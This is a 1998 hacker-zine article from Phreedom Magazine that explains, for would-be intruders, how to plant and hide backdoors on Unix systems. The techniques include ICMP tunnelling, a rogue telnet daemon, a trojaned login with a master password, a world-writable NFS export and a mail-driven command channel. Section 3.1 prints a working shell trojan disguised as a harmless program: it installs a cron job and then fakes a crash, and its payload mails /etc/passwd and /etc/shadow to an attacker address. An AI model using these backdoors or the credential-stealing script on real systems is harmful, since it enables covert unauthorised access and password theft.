- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [ a r t i c l e ] [ a u t h o r ] Backdoors in U**x Systems ManiaX Killerian - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1. What is a backdoor and can it grow here :) The so-called backdoors are programs which can give you unauthorised and not-too-easily-detectable access to a system.They come in several varieties- resident, working from time to time and offline. They can also be divided into several groups according to the protocol the use - typically TCP/IP, no not so often UDP/IP and pure IP, and a small portion uses SMTP and ICMP/IP. (Rem. from the Editor: they can grow anywhere you plant them...) 2. Resident (on-demand) backdoors These are the most commonly used backdoors for the simple reason of being the fastest ( no waiting required and you have an on-line session ). According to the used protocol we have the the following types of backdoors: 2.1. Backdoors using ICMP, for example loki. It is my personal favourite, that's why I'll start with it. Its shortest definition is 'Telnet through pings'. loki uses ICMP ping request and ICMP ping reply to transmit and receive the traffic of the telnet session. Its advantage is hard detection (it can be detected with loads of tcpdump-ing as well as ps-auxw, and the excellent knowledge of processes is a must). It works on Solaris, linux and BSD, though there are some problems with its compilation (a tutor can be found in phrack 49 and the source- in phrack 51, available in www.phack.com, ftp.phrack.com or ftp.fc.net/pub/phrack ). Its disadvantages are not many - it requires its own client, it doesn't support any authentication (no login or password), it cannot be used under windows (NAAAAAAAA! :) ); on the other hand the source is available for corrections of all shorcomings (well, apart from the first one). It supports several connection encryption methods such as blowfish,RSA or simply XOR :). During my experiments it perfomed very well, the only problem being its failure to get the end of the output of the command (netstat) right at least once. It is also not suitable for using interactive processes like vi, joe, tcpdump, etc. (this can be fixed with prying in the source as well....) 2.2. Backdoors using TCP/IP ........ It is the most common type, probably because it is the most simple, it runs everywhere, it can be used with a plain telnet client (in most cases), so you, miserable winboze users, are quite lucky here :))). The most simple way is to put another in.telnetd on port 666 or something else of that kind- it will allow you to login at any time to port 666, even though the traffic on the normal port 23 might be forbidden ( you can also run sshd (i.e. SecureShellDaemon) on some strange port). Another common case is the 'magik' password, which accepts any user, no matter what login he may have typed in ( it is achieved by modifying the /bin/login ). You can do an even cleverer trick - for example replacing sendmail with an older version that supports the 'wiz' command ( which lets you in root shell ... :) ), while changing the version number only ..... Generally, such attempts can be detected with 'netstat -a |grep LISTEN', but it still worth a try( p.s. this is THE BEST way to do a portscan - login and netstat -a |grep LISTEN). There are even smarter things, for example ACK-only telnet, which is used behind firewalls - if the firewall stops all incoming TCP connections to inside hosts ( i.e. the packets for negotiating the connection have their SYN flags raised), it then sends a packet without SYN, with ACK flag only,after which the daemon on the other side carries out the connection and voila... (Rem. from the Editor: if you have no idea about SYN or ACK, you should find the RFC with the description of the IP-header). ( paranoia seems to be after me as well - as I write these things, I frequently check if they are present on my server :) ) 2.3 Backdoors using UDP/IP The only backdoor that I can think about here is NFS - Network File System, which allows you to mount other people's disks, and with some luck (i.e. if they are read-write) to write whatever you like on them.Here is one of the best backdoors of this type : you add in /etc/exports the following: / (rw) which in our language means that the main dir. is now open for anyone willing to play tricks on it (you might be tempted to run rm -rf , but you'd better forget about doing it with nfs - it's terribly slow... ) 3. Not so everpresent backdoors - offline or working in certain moments 3.1. Offline backdoors In general, these are various clever tricks such as a changed passwd command - which stores passwords somewhere in plain text and sends them each night at 12:10;an addition to crontab that mails /etc/shadow and /etc/passwd daily.Alternatively it can copy them to /pub with 666 (no, not The Number Of the Beast, but rw-rw-rw-) attributes and all sorts of such nasty tricks ... Or a given address with procmail, to which we send a mail with some command and it then returns a mail with the command's result (it can be disguised as a mail from a false address, and the answer can contain an error, etc.). So here we have lots of options, and this particular type can be installed very easy by mailing something, for example a super program, which in fact reads: #!/bin/sh crontab -l >/tmp/NonUsblName echo "0 0 * * * $home/.hack" >>/tmp/NonUsbleName crontab /tmp/NonUsableName cp evil .hack sleep 2 echo Segmentation fault That's it, as simple as basic :) and here's an example for evil: #!/bin/sh cat /etc/passwd /etc/shadow |mail some_bad_guy@hotmail.com 64Enjoy life ...... 3.2. Working in certain moments This trick is intended for using behind very good firewalls that log and trace each tcp connection (there are really FEW of this kind). It is a program, which connects to you at certain intervals, you send commands and it runs them - like a backward telnet. Just like loki, it requires its own client - so it's not very convenient, but if you have no other option ..... That's all from me :)))) It almost SUX, but if you can write it better- just do it. (Rem. from the Editor: it really SUX,but if you have any experience with the stuff, i.e. you are not a true lamer, you will grasp it straight. ManiaX has just written it a as concise plan-summary...) ManiaX Killerian Copyright (C) 1998 Phreedom Magazine www.phreedom.org | phreedom.orbitel.bg staff@phreedom.org :: mboard.phreedom.org